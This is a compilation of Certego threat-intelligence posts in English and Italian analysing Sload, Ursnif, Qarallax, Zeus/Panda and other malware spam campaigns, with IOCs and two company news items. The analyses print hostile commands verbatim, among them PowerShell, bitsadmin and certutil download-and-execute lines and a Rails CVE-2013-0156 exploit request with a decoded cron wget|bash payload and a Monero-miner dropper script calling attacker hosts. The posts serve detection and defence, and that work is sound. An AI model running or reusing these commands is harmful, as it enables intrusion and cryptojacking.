Read this page in English. | Leggi questa pagina in English.

News

Hi everyone, here is Matteo Lodi, Threat Intelligence Analyst in Certego.

Recently, we saw a particular new spam campaign targeting italian users with the focus of delivering a downloader known as Sload.

Nowadays, attackers are trying harder and harder to make difficult the analysis and the detection. The most common tool misused in this way is Powershell: it's installed by default in every recent version of Windows and is commonly used to perform administrator tasks.

The infection chain

Let's dig in the infection chain:

1. User receives an email with subject "<TARGET_COMPANY_NAME> Emissione fattura <random_number>" containing a reference to a fake invoice.

The user is tricked to click on the malicious link that points to a randomly generated domain hosted with HTTPS in 91.218[.]127.189. The following is an example:

hxxps://usined[.]com/guide/documento-aggiornato-novembre-YY000059154

2. Once downloaded, if the user opens the archive, it would find two files. The first one is a legit image, while the second one is a .lnk file. We have already seen the misuse of shortcut files with powershell. But this time it seemed different: in fact, the .lnk points to the following command:

cmd.exe /C powershell.exe  -nop -eP ByPass -win hi"d"den -c "&{$9oc=get-childItem -path c:\users\* -recurse -force -include documento-aggiornato-novembre-*.zip;$7ig=get-content -LiteralPat $9oc.fullname;$7ig[$7ig.length-1]|iex}"<br />

3. Where is the download? At first glance, that seemed very strange. After having analyzed the command, the trick was clear. The attackers wants to call "Invoke-Expression" command to run a string hidden inside the zip itself!! But where?

As we can see in the following image, at the end of the original downloaded zip file we can see readable strings that are the real first stage downloader!!

The zip file is still a legit and correctly working archive!

4. The extracted command is the following:

"C:\WINDOWS\system32\cmd.exe" /c echo 1 > C:\Users\REM\AppData\Roaming\<UUID>\d  & bitsadmin /wrap /transfer fredikasledi /download /priority FOReGrOUnd "https://firetechnicaladvisor.com/globa/monu" C:\Users\REM\AppData\Roaming\<UUID>\fCBvxsTUjdWwkO.ps1 & del C:\Users\REM\AppData\Roaming\<UUID>\d & exit

5. The result is the download and the execution of another powershell script from a server hosted in 185.17[.]27.108. We saw different domains used but, in the last week, the Dropzone IP never changed. Also, we noted that the CnC server was blocking requests without the "Microsoft BITS/7.5" User-Agent to prevent unwanted download by non-infected machines.

This script was very well detected by antivirus engines as you can see in the following image!

How funny was I? Static analysis is completely useless in such cases.

Going forward, the malware drops the following items before deleting itself:

web.ini -> encrypted config file which stores second stage CnC servers URLS

config.ini -> encrypted file which contains the final powershell payload

<random_name>.vbs -> vbs script, next stage

<random_name>.ps1 -> called by the .vbs

Therefore it registers a service called "AppRunLog" to maintain persistence

6. At the end, it calls the registered task. This will execute the dropped Visual Basic Script file that, in turn, will execute the dropped Powershell script:

param ([string]$k = "");$jjyd=Get-Process -name powershell*;if ($jjyd.length -lt 2){$asdfasdf = (Get-WmiObject Win32_ComputerSystemProduct).UUID ;$log = $env:APPDATA+"\"+$asdfasdf;$key=$k -split "," ;$Secure= Get-Content $log"\config.ini";$Encrypted= ConvertTo-SecureString $Secure -key $key;$slStr = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($Encrypted);$rStr = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($slStr);Invoke-Expression $rStr;}

This script parses arguments and it won't execute properly in case they are not what it expects. It needs the numbers from 1 to 16 as arguments because, in fact, they are the key to decrypt the last stage.

7. The final payload is decrypted from the "config.ini" file and is called with "Invoke-Expression". It's loaded directly in memory: this makes very difficult for antivirus products to detect the threat. At the moment, this execution method is widely known as "fileless" because, indeed, the malware is never written on disk.

The payload is the last (finally) powershell script: it is the real Sload downloader which performs various malicious steps that were already explained in details in the article written by Proofpoint.

In few words, Sload can:

  1. Load external binaries
  2. Take screenshots
  3. Update configuration and CnC servers
  4. List running processes
  5. Detect Outlook usage

The variant we spotted in the last week uses the following CnC domains, which resolve in the same IP used by the second downloader stage (185.17[.]27.108)

ljfumm[.]me (HTTPS)
hamofgri[.]me (HTTPS)

However, we expect that this configuration won't last long, because, as we said before, Sload is able to update his CnC servers at any time.

Conclusion

We had a fantastic journey that made us understand, hopefully, how powerful can be Powershell and how attackers are misusing this tool to evade analysis detection.

We analyzed 5 different powershell scripts and that was only the "downloader" phase of the infection.

In case of a successfull one, Sload was seen to download known malware like Ramnit, Gootkit, DarkVNC or Ursnif (reference: Proofpoint). At that stage the threat would be really important.

Certego is monitoring the campaign and it's updating its signatures to correctly detect possible infections.

IOC

First stage download: (many and changing fast)
usined.com
darrenportermusic.com
supporto.eldersonfire.com
91.218[.]127.189

Second stage download: (many and changing fast)
firetechnicaladvisor.com
cltspine.info
185.17[.]27.108

CnC servers: (stable through the last week)
ljfumm[.]me 
hamofgri[.]me
185.17[.]27.108

Nelle ultime settimane i sistemi di monitoraggio Certego hanno rilevato un significativo aumento nella diffusione del malware Ursnif.

Questo aumento è dovuto al particolare sistema di spear phishing recentemente impiegato per diffondere tale malware. Questo sistema, già segnalato lo scorso Novembre da Barkly e ripreso questo mese da LibraesvaMetis, si basa su una tecnica che possiamo definire di thread injection: la vittima si vede recapitare un messaggio email come risposta ad una precedente conversazione con un suo contatto, con tanto di citazioni dei messaggi precedenti e firma del mittente, in cui si invita l'ignaro e fiducioso destinatario ad aprire il documento allegato.

Come è facile immaginare, l'allegato in questione, spesso in formato doc di Microsoft Word, in questione contiene in realtà delle MACRO il cui scopo è scaricare da un server remoto una copia del malware Ursnif e così infettare un altro host.

Come anticipato, i vantaggi di questa tecnica di phishing sono evidenti: il rapporto di fiducia che esiste tra le utenze riduce l'attenzione della vittima finale quando questa riceve il documento malevolo. Esiste però anche un altro vantaggio rispetto allo spam "tradizionale": si vengono a colpire esclusivamente utenti attivi e, contemporaneamente, si aggirano i sistemi di raccolta passivi dello spam.

Tuttavia, finora non si avevano prove certe su come operasse il malware per recuperare tali informazioni. Essendo Ursnif un malware la cui principale funzione consiste nel manomettere le connessioni verso i siti bancari (session hijacking), era abbastanza facile supporre che effettuasse la stessa operazione verso i client di posta e/o le webmail; così da raccogliere alcune conversazioni e inviare le mail di phishing sopra descritte. Il malware è così riuscito a trasformare le sue vittime in complici, per quanto ignari, della sua propagazione.

In questi giorni è però emerso un fatto interessante. Durante la sua attività di analisi di un esemplare di Ursnif, il ricercatore noto come  JAMESWT ha individuato su uno dei server utilizzati per distribuire gli eseguibili del malware una cartella contenente numerose informazioni relative ad account di posta.

L'analisi del contenuto della cartella indicata da JAMESWT ha portato alla luce una serie di file testuali in cui erano presenti accurate informazioni per accedere a diversi account di posta compromessi. Per ciascuna utenza sono riportati: nome utente, password, indirizzo del server email e protocollo di accesso.

<protocol>://<username>:<password>@<server>:<port>

Poco tempo dopo la segnalazione, i file con le credenziali compromesse sono stati rimossi dal server.

Questo rilevamento ci permette di affermare che, per quanto riguarda le campagne attualmente in atto, i responsabili della diffusione del malware Ursnif abbiano completo accesso e disponibilità delle caselle di posta delle loro vittime, senza alcuna necessità di utilizzare bot o strumenti di intercettazione. Inoltre, espone tutti i contatti delle vittime ad attacchi di spear phishing tramite thread injection, come quelli sopra descritti.

Analizzando alcune mail appartenenti a queste campagne in cerca di anomalie, abbiamo rilevato che il bounce address non corrispondeva con l'indirizzo presumibilmente compromesso. Il controllo degli header Received delle mail ha confermato che il server da cui venivano trasmesse queste mail apparteneva all'organizzazione del bounce address. In base a questo possiamo dire che, al momento in cui scrivamo questo articolo, gli account compromessi non vengano utilizzati per inviare attivamente le mail di phishing. Molto probabilmente si tratta di una scelta ponderata da parte degli attaccanti, in modo da aggirare eventuali filtri in uscita da parte dei server delle loro vittime: infatti un errore di consegna potrebbe allarmare l'utente (o il responsabile della gestione della mail aziendale) che andrebbe quindi in cerca di anomalie, utilizzando invece mail server di una terza parte si evitano questi "inconvenienti".

Il miglior modo per difendersi da questo genere di attacchi è non abilitare in alcun caso le MACRO di qualunque documento ricevuto via mail (o tramite link ricevuti via mail). È comunque importante possedere, e mantenere aggiornato, un buon sistema di difesa sia perimetrale (antispam, firewall) che locale (antivirus), così da ridurre il rischio e contrastare eventuali infezioni.

La piattaforma di Threat Intelligence Certego sta osservando alcune campagne di SPAM che utilizzano file con estensione .url come first-stage downloader per diffondere malware e aggirare i filtri anti-SPAM.

Cosa sono i file .url? Questo tipo di file viene normalmente utilizzato dai sistemi operativi Windows per salvare un collegamento a un sito web, in modo da poter essere facilmente acceduto tramite un semplice click. Di per sé non sono quindi file pericolosi, tuttavia possono essere abusati per la creazione di link malevoli.

La particolarità di questa campagna non risiede solo nell'utilizzo di questo particolare tipo di file, ma anche in come questi siano stati configurati. Infatti, tutti i campioni finora analizzati riportavano URL particolari, in cui lo  schema utilizzato non è il ben noto e diffuso http (o https). Viene invece utilizzato file.

Cosa comporta lo schema file? Questo schema solitamente viene utilizzato per l'accesso al filesystem locale. Può essere anche utilizzato con filesystem remoti, che su Windows vengono acceduti tramite il protocollo SMB.

Si tratta quindi di una nuova tecnica di diffusione di malware, sfruttando il protocollo SMB come canale d'ingresso.

Come funziona questo attacco? Come in tutte le campagne di spam, la vittima riceve una mail che annuncia la comunicazione di un documento contenuto nell'archivio ZIP allegato ad essa.

Una volta estratto il contenuto dello ZIP, l'utente si trova di fronte a quello che appare come un collegamento ad una cartella di Windows (in effetti è proprio di questo che si tratta!).
Una volta cliccato sull'icona l'host tenta di stabilire una connessione SMB con il server controllato dall'attaccante. Questi invia un file JScript che, una volta ricevuto, richiede all'utente se essere eseguito o salvato.

Il file JScript rappresenta il second-stage downloader: questo si collega a un altro server remoto da cui scarica un file eseguibile contenente altro codice malevolo.
Nei casi finora osservati, si è trattato di una variante del malware Quant Loader, il cui scopo è quello di assicurarsi persistenza sull'host e di scaricare altro malware (third-stage downloader).

Come ci si può proteggere da questo tipo di attacco?

 Come per tutti gli attacchi condotti tramite mail la prima linea di difesa è costituita dai filtri anti-SPAM. La componente preponderante però restano gli utenti, poiché senza il loro intervento questo genere di attacchi non potrebbe andare a buon fine; è quindi importante che questi siano istruiti sul fenomeno.

IOC
oggetti utilizzati

Continua a leggere

È con grande piacere che vi comunichiamo che Certego ha finalmente ottenuto dall'ente certificatore TÜV SÜD, uno dei più seri e rigorosi, la certificazione UNI CEI EN ISO/IEC 27001:2017, la più importante delle certificazioni sul sistema di gestione per la sicurezza delle informazioni.

Lo standard ISO/IEC 27001 è l'unica norma internazionale soggetta a verifica e certificabile che definisce i requisiti per un SGSI (Sistema di Gestione della Sicurezza delle Informazioni) ed è progettata per garantire la selezione di controlli di sicurezza adeguati e proporzionati. In questo modo è possibile proteggere le informazioni e dare fiducia agli stakeholder, in particolare ai propri clienti.

Grazie al nuovo Sistema di Gestione della Sicurezza delle Informazioni ed all’applicazione dei nostri modelli di Gestione del Rischio, i servizi di Cybersecurity erogati dalla piattaforma Certego PanOptikon sono protetti da processi e controlli di sicurezza che ne garantiscono la riservatezza, l'integrità e la disponibilità.   

L’ottenimento della certificazione ISO/IEC 27001 da parte del team di Incident Response si inserisce in un percorso di qualifiche e riconoscimenti internazionali che rendono Certego una delle realtà aziendali italiane più competenti ed esperte in materia di Cyber Security e Cyber Threat Intelligence.

Hi everyone, here’s Matteo Lodi, member of the Incident Response Team.

Today, we want to talk about a new threat we have just detected while analyzing the alerts generated by our platform.

Everthing started from the analysis of the following ET Signature ET TROJAN Windows executable base64 encoded.

At the first glance, it seemed that there were no executables downloaded.

That was quite strange. A deeper analysis showed that many hosts belonging to one of our customers downloaded a zip file from different domains but the same IP.

Here we are! We could guess that a new spam campaign has just started and many domains are being used to deliver a malware.

So, we started to analyze “Nuovo documento 2018.zip” to understand what kind of threat it is. Once uncompressed, we found inside a batch file called “Nuovo documento 2018.bat”.

The first two lines are the following:

@echo off
start http[:]//cloudblueprintprogram.com/images/documento.png?x1892

Oh, let’s see what it is:

A poorly trained eye could have just said to himself: “Well that’s just an image, this batch is harmless”

But it wasn’t. In fact, the batch file was other 200 empty lines long and, at the end of it, there were the following statements:

certutil -urlcache -split -f http[:]//cloudblueprintprogram.com/images4.php %TEMP%\tritype.txt > NUL
certutil -decode %TEMP%\tritype.txt %TEMP%\unslss.exe > NUL
start %TEMP%\unslss.exe
exit

So we found that it’s a downloader. It tries to get a fake php file that, indeed, it’s the base64 encoded executable reported by our platform.

We also noticed the CnC server has implemented a domain whitelist and it allows to download the malware only by the IPs it sent the phishing campaign. If someone tries to get the zip file connecting from other IPs, the site would return a xml empty page.

First VirusTotal analysis wasn’t really satisfying because there was no indication about the malware classification, enhancing our hypothesis about a new spreading threat:

Then, we sent the malware to our threat intelligence platform for further analysis.

External and internal feed couldn't identify with ease what kind of malware it is.

In fact, as already said, the threat is new: manual or automatic analysis didn't get a perfect indication. However, this kind of anti-VM and anti-debugging abilities could lead us to guess that it's an infostealer, probably a Ursnif variant.

Meanwhile, we alerted the customer: to contain the threat, we worked together to find the mail responsible of the infection. The mail was the following one:

Sender: Fugazzi324@intelectronica.com

Subject: fattura in sospeso

Buongiorno!
Da un controllo effettuato abbiamo visto che ha dei conti non pagate.
Se i conti non saranno saldati  entro 7 giorni, saremo costretti  a interrompere  la nostra collaborazione.
Se al contrario già effettuato il pagamento, li chiediamo di inoltrare la conferma.
E possibile visualizzare più dettagliato riguardo il saldo cliccando sul seguente link: documento

Cordiali Saluti

So, as already seen in older phishing campaigns, users have to pay attention to emails with “pending invoice” or similar as subject and they haven’t to get tricked to click to the link provided after panicking about a fake unpaid bill.

Conclusion

We found a new spam campaign delivering an evasive infostealer, targeting at least Italian users

IOC

IP: 185.61.152.71

URL

www.synchronr[.]com/jcsuyg?wkblw=142954 (Download)
www.hollywoodisruption[.]com/evhp?pdf=37857 (Download)
cloudblueprintprogram[.]com/images4.php (Malware)

MD5:

e1e4e1c8288a62c7f4acb9ba4b5d2a57 malware.exe (malware)
c7bfa2bb1a027d6179eaa5d48465fad3 images4.php (malware base64 encoded)
a09916eb46ff94a89f09a072100eb3eb Nuovo documento 2018.bat (dropper)

Our threat intelligence platform has been logging a huge spike in ruby http exploiting since yesterday (10 January) at 23:00.

The exploit is trying to leverege a fairly old CVE (CVE-2013-0156) that allows remote code execution. The following public Emerging Threat signature cover the exploit:

alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET CURRENT_EVENTS Possible CVE-2013-0156 Ruby On Rails XML POST to Disallowed Type YAML"; flow:established,to_server; content:"POST"; http_method; content:"|0d 0a|Content-Type|3a 20|"; pcre:"/^(?:application\/(?:x-)?|text\/)xml/R"; content:" type="; http_client_body; nocase; fast_pattern; content:"yaml"; distance:0; nocase; http_client_body; pcre:"/<[^>]*\stype\s*=\s*([\x22\x27])yaml\1/Pi"; reference:url,groups.google.com/forum/?hl=en&fromgroups=#!topic/rubyonrails-security/61bkgvnSGTQ; classtype:web-application-attack; sid:2016175; rev:3; metadata:created_at 2013_01_09, updated_at 2013_01_09;)

The attacker is sending the following data through a POST request:

POST / HTTP/1.1..Host: 127.0.0.1..User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)..X-HTTP-Method-Override:get..Content-Type: application/xml..Content-Length: 604....<xAdwt type='yaml'>--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection.'LtUgJyxM; eval(%[c3lzdGVtKCdjcm9udGFiIC1yOyB3Z2V0IC1WJiZlY2hvICIxICogKiAqICogd2dldCAtcSAtTyAtIGh0dHA6Ly9pbnRlcm5ldHJlc2VhcmNoLmlzL3JvYm90cy50eHQgMj4vZGV2L251bGx8YmFzaCA+L2Rldi9udWxsIDI+JjEifGNyb250YWIgLTt3Z2V0IC1WfHxjdXJsIC1WfGVjaG8gIjEgKiAqICogKiBjdXJsIC1zIGh0dHA6Ly9pbnRlcm5ldHJlc2VhcmNoLmlzL3JvYm90cy50eHQgMj4vZGV2L251bGx8YmFzaCA+L2Rldi9udWxsIDI+JjEifGNyb250YWIgLScpCg==].unpack(%[m0])[0]);' : !ruby/object:ActionController::Routing::Route. segments: []. requirements:. :MsLmhhug:. :FR: :MKqyF.</xAdwt>

The attacker sends a base64 encoded payload inside a POST request in the hope that the ruby interpreter configured on the server will execute it. By unpacking the payload we obtain the following code:

system('crontab -r; wget -V&&echo "1 * * * * wget -q -O - <a href="http://internetresearch.is/robots.txt">http://internetresearch.is/robots.txt</a> 2>/dev/null|bash >/dev/null 2>&1"|crontab -;wget -V||curl -V|echo "1 * * * * curl -s <a href="http://internetresearch.is/robots.txt">http://internetresearch.is/robots.txt</a> 2>/dev/null|bash >/dev/null 2>&1"|crontab -')

This is a very simple bash script that adds a new entry in the crontab of the host. The cronjob is executed once per hour (notice the number 1: it means every first minute of every hour) and it downloads the file robots.txt via wget. The file is piped through bash, so most probably it’s a text file containing a shell script. By manually downloading it we can confirm our hypothesis. This is the file content:

x86_64="http://internetresearch.is/sshd"
i686="http://internetresearch.is/sshd.i686"
touch .test||cd /dev/shm||cd /tmp 2>/dev/null
>$MAIL&&chmod 000 $MAIL
rm .test 2>/dev/null
rm sshd* 2>/dev/null
pkill -9 xmrig 2>/dev/null
pid=$(pgrep -f -o 'tQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8')
test $pid && pgrep -f 'tQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8' | grep -vw $pid | xargs -r kill -9
pgrep -f tQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8 && exit 0
wget --no-check-certificate "$x86_64" -O .sshd||curl -k "$x86_64" -o .sshd
wget --no-check-certificate "$i686" -O .sshd.i686||curl -k "$i686" -o .sshd.i686
chmod +x .sshd .sshd.i686
pgrep -f hashvault||./.sshd -o pool.monero.hashvault.pro:5555 -u 45e9rBtQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8crBXzPeGPLM6t8QE3s6JS5LNJUGMGmibF9yZhjVoCbUvz989EsT6h -p x -k -B||wget <a href="http://lochjol.com/FAIL">http://lochjol.com/FAIL</a> -O /dev/null --user-agent "$(uname -p)"||curl <a href="http://lochjol.com/FAIL">http://lochjol.com/FAIL</a> --user-agent "$(uname -p)"
pgrep -f hashvault||./.sshd.i686 -o pool.monero.hashvault.pro:5555 -u 45e9rBtQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8crBXzPeGPLM6t8QE3s6JS5LNJUGMGmibF9yZhjVoCbUvz989EsT6h -p x -k -B||wget <a href="http://lochjol.com/FAIL">http://lochjol.com/FAIL</a> -O /dev/null --user-agent "$(uname -a)"||curl <a href="http://lochjol.com/FAIL">http://lochjol.com/FAIL</a> --user-agent "$(uname -a)"<br /><br />

The script checks if there is a a coinminer already in execution and, if not, it downloads the coinminer from http://internetresearch[.]is/sshd (or sshd.i686), launching it afterwards. We found the coinminer used is the linux version of XMRIG Cpu Miner http://internetresearch[.]is/sshd

IOC
185.130.104.17 80 GET <a href="http://internetresearch.is/robots.txt">http://internetresearch[.]is/robots.txt</a> (Cronjob Bash script) 
185.130.104.17 80 GET <a href="http://internetresearch.is/sshd">http://internetresearch[.]is/sshd</a> (x86-64 XMRIG coinminer download) 
185.130.104.17 80 GET <a href="http://internetresearch.is/sshd.i686">http://internetresearch[.]is/sshd</a> (i686 XMRIG coinminer download) 
185.130.104.17 80 GET <a href="http://lochjol.com/FAIL">http://internetresearch[.]is/sshd</a> (Sending system Info in User Agent) 
XMRIG Executable:
MD5:  761f5cfd0a3cddb48c73bc341a4d07a9
FileSize: 723080 bytes
VirusTotal: <a href="https://www.virustotal.com/#/file/79af5a2e617ad43d6da98a29528e0cc771cb8393607614d9a2fe9ba572b5aee5/detection">http://internetresearch.is/sshd</a><br />

Salve a tutti, scrive Matteo Lodi, membro dell'Incident Response Team.

Oggi vorrei parlare di una nuova minaccia che abbiamo rilevato casualmente durante l'analisi degli allarmi generati dalla nostra piattaforma.

Tutto cominicia dall'analisi di una piccola e solitaria firma ET di livello 2 chiamata "ET PRO POLICY DNS Query to .onion proxy Domain (onion . casa)".


All'inizio, l'unica evidenza che avevamo dall'analisi del traffico erano diverse richieste DNS seguite da 4 contatti via HTTPS al seguente strano dominio: vvrhhhnaijyj6s2m.onion[.]casa

Abbiamo scoperto che onion.casa è un proxy usato allo scopo di accedere ai servizi nascosti all'interno della famosa rete TOR. Nel dettaglio, proseguendo nell'analisi, abbiamo trovato che il dominio citato ospita un sito che dichiara di vendere un malware noto come Qarallax.

Qarallax è un RAT (remote access tool) e infostealer. Questo malware è nato da un clone del noto software open-source chiamato LaZagne. Tuttora, l'artefatto fornisce ad un eventuale attaccante la possibilità di effettuare diverse azioni sulla macchina infetta, tra cui:

  • Catturare movimenti del mouse e click
  • Catturare l'input della tastiera
  • Controllare la webcam e registrare lo schermo
  • Ottenere tutte le credenziali presenti sul browser, nei messaggi di chat, negli eventuali database configurati sull'host e nei programmi di Email

Un gruppo chiamato Quaverse dichiara di essere il reparto R&D che ha sviluppato questa minaccia e che, costantemente, lavora allo scopo di evolvere e aggiornare il malware. Il loro obiettivo è di vendere l'agente come un RaaS (RAT as a Service).

Questo file è un'applicazione scritta in JAVA capace di eseguire sui sistemi operativi che hanno installato il JAVA Runtime Environment (JRE). Agisce silenziosamente in sottofondo, senza lasciare alcuna indicazione della sua presenza all'utente.

A questo punto dell'analisi, non avevamo la prova certa che l'host che contattava il dominio sospetto fosse infetto; tuttavia eravamo fortemente motivati a investigare ulteriormente allo scopo di capire se si trattasse di una minaccia reale.

Siamo andati alla ricerca di qualche fonte di intelligence sul web, con la speranza che qualcuno avesse trovato informazioni utili sul dominio citato. Inizialmente, abbiamo controllato su Google, Twitter e Reverse ma non abbiamo trovato niente. Poi, tramite VirusTotal, abbiamo trovato che il seguente URL era catalogato come malevolo: hxxps://vvrhhhnaijyj6s2m.onion[.]casa/storage/cryptOutput/0.92915600%201512026521.jar

Wow, solo 3 rilevazioni e nessun sample caricato su VT. Comunque, in quel momento, abbiamo avuto un'idea su cosa avessero fatto le connessioni SSL: scaricare un .jar contenente, con alta probabilità, il malware.

Nel frattempo, abbiamo contattato il cliente e, fortunatamente, l'host infetto era una macchina virtuale che è quindi stata ripristinata ad uno stato pulito senza problemi. Inoltre l'agente antivirus aveva rilevato e fermato l'esecuzione del malware.

A questo punto, le vere domande da porsi erano:

  • come si erano infettati?
  • l'attacco era opportunistico o mirato?

Il giorno successivo, all'interno della nostra spamtrap, abbiamo rilevato un artefatto chiamato "IMG6587JPG..jar", identificato come malevolo (8.2/10 score) dalla nostra sandbox. Il primo elemento dove abbiamo concentrato la nostra attenzione è stato il traffico che questa applicazione aveva generato verso il dominio sospetto.

Et voila! Probabilmente avevamo trovato il malware scaricato dal nostro cliente e, fortunatamente, era arrivato da una classica email di spam che ingannava l'utente allo scopo di fargli aprire una finta immagine che, in realtà, conteneva l'infostealer.

Sender: maite@inauxacomercial.com
Subject: New order_IMG_6587 JPG-2017

Dear Good day, Am interested in your product i saw online with our new purchase, feed us with more of your samples.
kindly exermine the new order and tell us your paymwent terms Thanks in Anticipation.
note:VERY URGENT
Regards
IBRAHIM M.D Commercial Department SUMINISTROS INDUSTRIALES CHEMICAL SL Pol.ibrahim, 228000 Getafe Madrid Email : maite@inauxacomercial.com

Fatto interessante è stato che solo 4 antivirus lo avessero rilevato. Dopo solo 4 ore, qualche altro prodotto antimalware aveva iniziato ad identificare il software come malevolo (15).

Abbiamo comunicato le informazioni al nostro cliente che è riuscito ad identificare la mail che ha portato all'infezione e ha provveduto ad inviarcela. La variante di Qarallax era pressochè identica a quella che avevamo rilevato pochi minuti prima. L'unico elemento di differenza era il corpo della mail (diverso nella lingua, da inglese a italiano) e il nome del campione: PAGAMENTO.jar. Anche in questa occasione, la prima volta che abbiamo inviato il file a VT, solo pochi antivirus erano stati capaci di identificarlo.

Aggiornamento

Abbiamo rilevato nuove varianti del malware che, tuttavia, mantiene le stesse potenzialità. La differenza più rilevante è il proxy sfruttato allo scopo di contattare il server di comando e controllo: da onion.casa a onion.top. Ci teniamo a sottolineare come la minaccia stia evolvendo giorno per giorno: ogni nuovo campione che analizziamo risulta praticamente irrilevato da ogni genere di antivirus.

Conclusioni

Abbiamo identificato una nuova campagna di spam che diffonde un RAT con la capacità di evadere il rilevamento della maggior parte dei software AV o delle firme IDS.

IOC

Domini:

vvrhhhnaijyj6s2m.onion[.]casa
vvrhhhnaijyj6s2m.onion[.]top

RAT samples (MD5):

6d921290e0cacf6663890aa3dcb94845
f441dc0388afd3c4bca8a2110e1fa610
682f0260cd0bb8716d32485eebfe1d31
cb9da672613decdc800849a45f21c0b8
d77cfa2b68c744f3ba62f2e49a598ffa
d9adbb40a0ae557c5bf1d2dd2f85409d
42ecb562506ec1734cc291c0092753c5
702f6c5856591accb8cdd4bcfc46e114

Certego, la società del gruppo VEM sistemi specializzata nell’erogazione di servizi di sicurezza IT gestita e di contrasto al Cybercrime, è stata nuovamente citata nel rapporto Gartner “Competitive Landscape: Threat Intelligence Services, Worldwide, 2017” come esempio di Regional Player di servizi di Threat Intelligence (TI) per Industria e PA.

La maggior parte dei player del mercato della Threat Intelligence sono originari degli Stati Uniti, tuttavia stanno assumendo un ruolo sempre più centrale anche le aziende locali che beneficiano della domanda internazionale in crescita in questo settore.

“Siamo onorati dal fatto che Gartner, dopo aver nominato Certego nel Report 2015, abbia nuovamente citato la nostra azienda come Regional Player nel “Competitive Landscape: Threat Intelligence Services, Worldwide, 2017”, riteniamo che sia una conferma del nostro modello di protezione adattiva (Adaptive Cyber Defence)”, prosegue Grignaffini, “affianchiamo al concetto di prevenzione di stampo tradizionale quello di Rilevamento (Rapid Detection) e di Capacità di Risposta (Incident Response Coordination) , adattando continuamente le strategie di difesa dei nostri clienti in modo da ridurre significativamente gli effetti degli attacchi e migliorare costantemente l’efficacia dei sistemi di protezione (Continuous Vulnerability Assessment).”

Grazie all’estensione della propria rete di monitoraggio (più di 70.000 sistemi sotto protezione e la gestione di migliaia di incidenti di sicurezza all’anno), Certego rappresenta un punto di osservazione privilegiato sul cyber crime in Italia. “Possediamo infatti dati e statistiche nazionali che ci permettono di cogliere i trend in corso e di anticipare i pericoli più significativi per i nostri clienti,” precisa Grignaffini, “ stiamo osservando un continuo incremento della capacità di monetizzare gli attacchi da parte dei cyber criminali, che sono riusciti a raggiungere un vero e proprio “consolidamento” del proprio business, con una progressiva contaminazione della criminalità informatica da parte della criminalità organizzata tradizionale. Di conseguenza, negli ultimi tempi, i servizi di threat Intelligence sono diventati sempre più centrali nei business plan aziendali, anche se le aziende più piccole spesso faticano a comprendere la reale esposizione ai rischi del Cyber Crime.”

La versione integrale del report è disponibile all'indirizzo https://www.gartner.com/ consultabile su abbonamento.

Disclaimer
Gartner, Competitive Landscape: Threat Intelligence Services, Worldwide, 2017, 26 July 2017
Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner's research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

Da Aprile 2017 le piattaforme di threat intelligence di Certego hanno iniziato a seguire alcune particolari campagne di spam volte a diffondere trojan bancari su target italiani.

La particolarità di queste campagne è di utilizzare come download zone per i propri payload siti aventi sempre cedacriall come dominio di secondo livello e certificati gratuiti firmati dal progetto Let’s Encrypt.

Il malware: Zeus/Panda

Panda (o Zeus/Panda) è il nome con cui viene comunemente indicata una variante del malware bancario Zeus.

I malware appartenenti a questa famiglia sono solitamente utilizzati per compiere attacchi di tipo Man in the Browser, una volta infettato un host il malware prende il controllo dei browser installati registrando ogni dato immesso e/o alterando le sessioni di accesso ad alcuni siti.

Inoltre questa famiglia di malware agisce come una botnet: ogni macchina infetta è collegata ad una serie specifica di server di Comando e Controllo (CnC). Il malware periodicamente contatta il proprio server CnC, comunicandovi le informazioni raccolte e richiedendo nuove configurazioni su cosa monitorare.

Le campagne

04/04/2017 - Fattura Amministrazione

La prima diffusione registrata dai nostri sistemi risale al 4 Aprile di quest’anno, descritta in questo articolo su My Online Security. Le mail di phishing rilevate avevano i seguenti oggetti:

Invio fattura/invoice
fattura del 04\04\2017
Invio fattura/ordine
ordine 04.04.2017
fattura del 04.04.2017

Le mail in questione avevano contenuti simili al seguente:

Gentile Cliente,
al pagamento della fattura in allegato alla presente.
Grazie
Confidando nel Vostro sollecito riscontro, inviamo i nostri distinti saluti.
Amministrazione

Tutte le mail rilevate avevano i medesimi allegati, due documenti Word

pagina 1.doc    a7960e5a86d7aee713f3c0fcee6c96e4
pagina 2.doc    5c66df3788a08c83a97a1074006e09e8

Questi documenti effettuavano il download di una versione di Zeus/Panda dalla seguente risorsa:

hxxps://cedacriall.review/eli.exe

La particolarità di questo download è di avvenire abusando un certificato gratuito fornito dall’organizzazione Let’s Encrypt.

23/05/2017 - Fattura Maggio e F24

La seconda diffusione, descritta in questo articolo di My Online Security, utilizza due temi differenti nella stessa giornata.

Fattura Maggio

Il primo tema riguardava una presunta fattura relativa al mese di Maggio, inviava mail con i seguenti oggetti:

fatt di maggio XXXXXX
richiesta fattura n. XXXXXX
fatt di maggio XXXXXX
Invio fattura XXXXXX
richiesta fattura n. XXXXXX

Nelle mail si usava poi un contenuto di questo tipo:

Le fatture n. XXXXXX del 23/05/2017 sono in formato WORD per essere visualizzate e stampate. 
Il presente invio SOSTITUISCE INTEGRALMENTE quello effettuato in modo tradizionale a mezzo servizio postale. E’ quindi necessario GENERARNE UNA STAMPA e procedere alla relativa archiviazione come da prassi a norma di legge. La stampa da parte sua dei documenti fa fede ai fini fiscali e contabili.Confidando nel Vostro sollecito riscontro, inviamo i nostri distinti saluti.

In questo caso l’allegato delle mail era il seguente documento Word:

fattura.05.doc    3fa667c19c7e6cfc41dedba1e282bbd3

In questo caso sembra sia stato fatto un errore di compilazione del downloader, poiché il file richiedeva la seguente URL errata

ehtps://cedsbmurriall.info/polo.exe

Tuttavia sembra che il dominio dovesse essere cedacriall.info.

F24

Il secondo tema riguardava invece il modulo fiscale F24, con i seguenti oggetti

pagamento F24
PAGAMENTO f24
copia del pagamento
pagamento2017-05
